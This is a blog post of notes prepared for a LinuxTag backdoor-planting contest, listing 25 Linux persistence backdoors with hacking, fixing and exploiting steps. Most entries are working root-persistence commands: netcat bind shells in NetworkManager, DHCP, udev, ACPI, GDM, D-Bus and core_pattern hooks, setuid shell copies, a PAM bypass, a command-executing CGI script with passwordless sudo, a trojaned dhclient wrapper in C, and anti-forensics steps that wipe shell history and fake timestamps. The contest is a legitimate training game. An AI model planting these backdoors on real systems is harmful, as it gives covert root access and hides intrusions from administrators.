As I wrote the other day, I have been to LinuxTag in Berlin. And Almost like last year a Hacking contest took place.
The rules were quite the same: Two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops so that you have the opponents machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off what backdoors were left in the system.
So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out to not be very good for the actual contest, because they are not structured well enough.
Since the game has three rounds, it makes sense to have a structure with three parts as well. Hence I produced a new set of notes with headlines for each backdoor and three parts per section. Namely Hacking, Fixing and Exploiting.
The notes weren’t all ready just before the contest and hence we didn’t score pretty well. But I do think that our notes are quite cool by now though. Next time, when we’re more used to the situation and hopefully learned through suffering to not make all those tiny mistakes we did, we might play better.
So enjoy the following notes and feel free to give feedback.
Set Keyboard to US English:
setxkbmap us
export HISTFILE=/dev/null
ln -sf ~/.bash_history /dev/null
ln -sf ~/.viminfo /dev/null
while true; do find / -exec touch {} \; ; sleep 2; done
1 passwd new user
Remote
root
1.1 Hacking
nano /etc/passwd
copy and paste root user to a new user, i.e. hackr.
sudo passwd hackr
1.2 Fixing
grep :0: /etc/passwd
1.3 Exploiting
ssh hackr@localhost
2 dePAMify
Remote
root
2.1 Hacking
cd /lib/security/ cp pam_permit.so pam_deny.so echo > /etc/pam.d/sshd /etc/init.d/sshd restart
2.2 Fixing
too hard
2.3 Exploiting
ssh root@localhost
enter any password
3 NetworkManager
Remote
root
3.1 Hacking
nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF nc.traditional -l -p 31346 -e /bin/bash & cp /bin/dash /etc/NetworkManager/dhclient chmod +s /etc/NetworkManager/dhclient EOF
3.2 Fixing
ls /etc/NetworkManager/dispatcher.d/
3.3 Exploiting
less /etc/NetworkManager/dispatcher.d/
Disconnect Network via NetworkManager
Connect Network via NetworkManager
/etc/NetworkManager/dhclient netcat localhost 31346
4 SSHd
Remote
root
4.1 Hacking
su - ssh-keygen cd cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys cat .ssh/id_rsa | tee /etc/issue.net cp /etc/ssh/sshd_config /tmp/ nano /etc/ssh/sshd_config <<EOF AuthorizedKeysFile /etc/ssh/authorized_keys Banner /etc/issue.net EOF /etc/init.d/ssh reload mv /tmp/sshd_config /etc/ssh/
4.2 Fixing
less /etc/ssh/sshd_config /etc/init.d/ssh reload
4.3 Exploiting
ssh root@localhost 2> /tmp/root chmod u=r,go= $_ ssh -i /tmp/root root@localhost
5 xinetd
Remote
root
5.1 Hacking
cp /etc/xinetd.d/chargen /etc/xinetd.d/chargen.bak nano /etc/xinetd.d/chargen <<EOF disable = no DELETE type = INTERNAL server = /bin/dash EOF /etc/init.d/xinetd restart mv /etc/xinetd.d/chargen.bak /etc/xinetd.d/chargen
5.2 Fixing
grep disable /etc/xinetd.d/* | grep no
5.3 Exploiting
nc localhost chargen
6 Apache
Remote
root
Needs testing
6.1 Hacking
nano /etc/apache2/sites-enabled/000-default DocumentRoot / Make <Directory /> and copy allowance from below /etc/init.d/apache2 restart touch /usr/lib/cgi-bin/fast-cgid chmod a+rwxs $_ touch /usr/lib/cgi-bin/fast-cgid.empty chmod a+rwxs $_ nano /usr/lib/cgi-bin/fast-cgid <<EOF #!/bin/bash IFS=+ $QUERY_STRING EOF nano /etc/sudoers <<EOF www-data ALL=NOPASSWD: ALL EOF
6.2 Fixing
ls -l /usr/lib/cgi-bin/ nano /etc/apache2/sites-enabled/* /etc/init.d/apache2 restart
6.3 Exploiting
links2 http://localhost/ # Remote file access links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution grep NOPASS /etc/sudoers # local privilege escalation links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF /bin/dash EOF /usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation
7 screen
Local
root
7.1 Hacking
sudo chmod u+s /bin/dash sudo mkdir -p /etc/screen.d/user/ sudo chmod o+rwt /etc/screen.d/user/ # NOW AS USER!!1 SCREENDIR=/etc/screen.d/user/ screen # IN THE SCREEN dash C-d
7.2 Fixing
ls -l /var/run/screen rm -rf /var/run/screen/* sudo lsof | grep -i screen | grep FIFO rm these files
7.3 Exploiting
SCREENDIR=/etc/screen.d/user/ screen -x
8 hidden root dash
Local
root
8.1 Hacking
cp /bin/dash /usr/bin/pkexec.d chmod +s !$ cp /bin/dash /etc/init.d/powersaved chmod +s !$
8.2 Fixing
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;
rm these files
8.3 Exploiting
/etc/init.d/powersaved /usr/bin/pkexec.d
9 DHCP Hook
Local
Remote
root
9.1 Hacking
nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF nc.traditional -l -p 31347 & cp /bin/dash /var/run/dhclient chmod +s /var/run/dhclient EOF
9.2 Fixing
ls -l /etc/dhcp3/dhclient-exit-hooks.d/ ls -l /etc/dhcp3/dhclient-enter-hooks.d/
9.3 Exploiting
Reconnect Network via DHCP
/var/run/dhclient netcat localhost 31347
10 ConsoleKit
Local
root
Switchen VTs is triggered locally only, although one might argue that switching terminals is done every boot. Hence it’s kinda automatic.
10.1 Hacking
sudo -s touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck #!/bin/sh chmod u+s /bin/dash nc.traditional -l -p 31337 -e /bin/dash &
10.2 Fixing
ls /usr/lib/ConsoleKit/run-seat.d/
Only one symlink named udev-acl.ck is supposed to be there.
10.3 Exploiting
ls /usr/lib/ConsoleKit/run-seat.d/
Switch TTY (Ctrl+Alt+F3)
execute /bin/dash
nc IP 31337
11 SIGSEGV
Local
root
11.1 Hacking
echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern
11.2 Fixing
cat /proc/sys/kernel/core_pattern echo core > /proc/sys/kernel/core_pattern
11.3 Exploiting
ulimit -c unlimited sleep 1m & pkill -SEGV sleep nc localhost 31335
12 nc wrapper
Remote
Local
root
12.1 Hacking
setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <unistd.h>
int main (int argc, char* args[]) {
int ret = fork ();
if (ret == 0) {
chmod("/bin/dash", 04755);
execlp ("/usr/bin/nc.traditional", "nc.traditional",
"-l" ,"-p", "31339", "-e", "/bin/dash", (char*) NULL);
} else
execvp("/sbin/dhclient6", args);
return 0;
}
EOF
/etc/init.d/networking stop # Or disable via NotworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start # Or enable via NotworkManager
12.2 Fixing
12.3 Exploiting
12.3.1 real dhclient
Disconnect with Network Manager
Connect with NetworkManager
dash
nc localhost 31339
12.3.2 cron
Just wait. Or reboot.
13 evbug
Remote
Writes Keycodes to syslog.
Type: 1 are keypresses, and “code” is the actual keycode.
evtest shows which key maps to which keycode.
Unfortunately, Debian does not seem to have that module.
13.1 Hacking
modprobe evbug %FIXME: Maybe pull netconsole nano /etc/modprobe.d/blacklist.conf
13.2 Fixing
modprobe -r evbug
13.3 Exploiting
dmesg | grep "Type: 1"
14 Vino
Remote
14.1 Hacking
sudo -s xhost + nohup /usr/lib/vino/vino-server & vino-preferences
14.2 Fixing
vino-preferences ps aux | grep vnc
14.3 Exploiting
vncviewer IP
15 GDM InitScript
Local
Remote
root
15.1 Hacking
nano /etc/gdm/Init/Default <<EOF cp /bin/dash /etc/gdm/gdm-greeter chmod +s /etc/gdm/gdm-greeter nc.traditional -l -p 31345 -e /bin/dash & EOF
15.2 Fixing
less /etc/gdm/Init/Default
15.3 Exploiting
Log off Log on /etc/gdm/gdm-greeter nc localhost 31345
16 shadow a+rw
Local
root
16.1 Hacking
chmod a+rw /etc/shadow
16.2 Fixing
ls -l /etc/shadow chmod u=rw,g=r /etc/shadow
16.3 Exploiting
nano /etc/shadow
17 SysV Init Alt+Up
Local
root
17.1 Hacking
touch /etc/init.d/throttle chmod a+x $_ nano $_ <<EOF #!/bin/sh exec </dev/tty13 >/dev/tty13 2>/dev/tty13 exec /bin/bash EOF nano /etc/inittab <<EOF kb::kbrequest:/etc/init.d/throttle EOF init q
17.2 Fixing
nano /etc/inittab
17.3 Exploiting
Ctrl+Alt+F1, Alt+Up, Alt+Left
18 SysV Init Ctrl+Alt+Del
Local
root
18.1 Hacking
nano /etc/inittag <<EOF ca:12345:ctrlaltdel:chmod +s /bin/dash EOF init q
18.2 Fixing
nano /etc/inittag
18.3 Exploiting
Ctrl+Alt+F1, Ctrl+Alt+Del, dash
19 SysV Init tty14
Local
root
19.1 Hacking
nano /etc/inittag <<EOF 14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14 EOF init q
19.2 Fixing
less /etc/inittag
19.3 Exploiting
Ctrl+Alt+F1, Alt+Left
20 DBus Root Service
Local
root
20.1 Hacking
cd /usr/share/dbus-1/system-services/ cp org.freedesktop.org.UPower org.Rootme.Remotely.service nano org.Rootme.Remotely.service << EOF [D-BUS Service] Name=org.Rootme.Remotely Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash User=root EOF cp org.freedesktop.org.UPower org.Rootme.Locally.service nano org.Rootme.Locally.service << EOF [D-BUS Service] Name=org.Rootme.Locally Exec=/bin/chmod u+s /bin/dash User=root EOF
20.2 Fixing
grep Exec /usr/share/dbus-1/system-services/*.service
20.3 Exploiting
dbus-send -system -print-reply -dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally
dbus-send -system -print-reply -dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely
nc localhost 31343
dash
21 Crontabs
Local
Remote
root
21.1 Hacking
touch /etc/cron.d/pamd chmod a+x /etc/cron.d/pamd nano /etc/cron.d/pamd <<EOF */2 * * * * root cp /bin/dash /usr/share/gdm/chooser */2 * * * * root chmod +s /usr/share/gdm/chooser EOF touch /etc/cron.d/dhclient chmod a+x /etc/cron.d/dhclient nano /etc/cron.d/dhclient <<EOF */2 * * * * root /sbin/mount.btrfs EOF
21.2 Fixing
sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/
21.3 Exploiting
ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser Wait /usr/share/gdm/chooser nc -l localhost 31339
22 udev
Localroot
udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware.
Under the assumption that a Laptop will have a rfkill switch, one could write the following rules.
Note that the commands block, i.e. to hit the second rule, the first program must exist.
udev automatically reloads the rules.
22.1 Hacking
nano /lib/udev/rules.d/99-rfkill.rules <<EOF SUBSYSTEM=="rfkill", RUN +="/bin/nc.traditional -l -p 31337 -e /bin/sh" SUBSYSTEM=="rfkill", RUN +="/bin/chmod +s /bin/dash" EOF
22.2 Fixing
grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/
but too hard
22.3 Exploiting
toggle rfkill via hardware switch
nc localhost 31344 dash
23 ACPI Powerbtn
Local
root
23.1 Hacking
nano /etc/acpi/powerbtn.sh <<EOF nc.traditional -l -p 31348 -e /bin/sh /bin/chmod +s /bin/dash EOF
23.2 Fixing
ls /etc/acpi/ less /etc/acpi/powerbtn.sh
23.3 Exploiting
Press power button
nc localhost 31348 dash
24 PolicyKit GrantAll
Local
root
Note that this reflects policykit 0.96 which has a deprecated config file syntax.
24.1 Hacking
nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy change org.freedesktop.policykit.exec to read <defaults> <allow_any>yes</allow_any> <allow_inactive>yes</allow_inactive> <allow_active>yes</allow_active> </defaults> pkill polkitd
24.2 Fixing
nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy change org.freedesktop.policykit.exec to read <allow_any>auth_admin</allow_any> <allow_inactive>auth_admin</allow_inactive> <allow_active>auth_admin</allow_active> pkill polkitd
24.3 Exploiting
pkexec id
25 decoy timestamps
No hack in the traditional sense but stuff that one might need to do.
25.1 Hacking
for i in `find /etc/ /bin/ /sbin/ /var/spool/ /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do touch $i; done export HISTFILE=/dev/null rm ~/.*history*
25.2 Fixing
25.3 Exploiting
find / -mtime -1 find / -ctime -1
